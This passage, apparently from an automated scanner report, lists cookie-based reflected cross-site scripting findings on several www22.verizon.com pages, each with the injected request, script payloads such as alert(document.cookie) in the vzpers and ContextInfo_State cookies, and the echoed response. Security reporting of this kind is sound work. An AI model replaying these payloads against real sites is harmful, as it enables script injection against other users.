Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX46426'><script>alert(1)</script>15b784f92f9; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 130074
Expires: Mon, 13 Dec 2010 00:51:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX46426'><SCRIPT>ALERT(1)</SCRIPT>15B784F92F9 ' />
...[SNIP]...

1.80. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 9c71d<script>alert(1)</script>df0f75a01b0 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX9c71d<script>alert(1)</script>df0f75a01b0; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 130070
Expires: Mon, 13 Dec 2010 00:51:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9C71D<SCRIPT>ALERT(1)</SCRIPT>DF0F75A01B0 </DIV>
...[SNIP]...

1.81. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 4a8e4<script>alert(1)</script>8ea8b8a4b07 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX4a8e4<script>alert(1)</script>8ea8b8a4b07; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78027
Expires: Mon, 13 Dec 2010 00:51:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4A8E4<SCRIPT>ALERT(1)</SCRIPT>8EA8B8A4B07 </DIV>
...[SNIP]...

1.82. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57acd'><script>alert(1)</script>464e57ef61a was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX57acd'><script>alert(1)</script>464e57ef61a; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78031
Expires: Mon, 13 Dec 2010 00:51:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX57ACD'><SCRIPT>ALERT(1)</SCRIPT>464E57EF61A ' />
...[SNIP]...

1.83. http://www22.verizon.com/Residential/HighSpeedInternet [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 8c03b<script>alert(1)</script>931f515c353 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX8c03b<script>alert(1)</script>931f515c353; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 185053
Expires: Mon, 13 Dec 2010 00:56:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:01 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:01 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8C03B<SCRIPT>ALERT(1)</SCRIPT>931F515C353 </DIV>
...[SNIP]...

1.84. http://www22.verizon.com/Residential/HighSpeedInternet [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1593a'><script>alert(1)</script>8026ef8e943 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX1593a'><script>alert(1)</script>8026ef8e943; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 185069
Expires: Mon, 13 Dec 2010 00:55:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:55 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1593A'><SCRIPT>ALERT(1)</SCRIPT>8026EF8E943 ' />
...[SNIP]...

1.85. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7851e'><script>alert(1)</script>7e50b76ec78 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/bundles/overview
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TX7851e'><script>alert(1)</script>7e50b76ec78; canigetfios=Y; showpromo=N; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential; RVServiceLocation=TX; ContextInfo_State=TX; refURL=http://www22.verizon.com/Residential/Internet/; CP=null*; BTagRequired=N; CMS_TimeZoneOffset=360

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64672
Expires: Mon, 13 Dec 2010 00:46:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:46:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:46:18 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:51:18 GMT; path=/residential/; domain=verizon.com

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7851E'><SCRIPT>ALERT(1)</SCRIPT>7E50B76EC78 ' />
...[SNIP]...

1.86. http://www22.verizon.com/Residential/HighSpeedInternet/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload ea9f0<script>alert(1)</script>8ee5c39a921 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXea9f0<script>alert(1)</script>8ee5c39a921; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110962
Expires: Mon, 13 Dec 2010 00:56:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEA9F0<SCRIPT>ALERT(1)</SCRIPT>8EE5C39A921 </DIV>
...[SNIP]...

1.87. http://www22.verizon.com/Residential/HighSpeedInternet/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23aa'><script>alert(1)</script>02a916d30d2 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXa23aa'><script>alert(1)</script>02a916d30d2; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110970
Expires: Mon, 13 Dec 2010 00:56:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA23AA'><SCRIPT>ALERT(1)</SCRIPT>02A916D30D2 ' />
...[SNIP]...

1.88. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 89205<script>alert(1)</script>0b121ed9d50 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX89205<script>alert(1)</script>0b121ed9d50; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
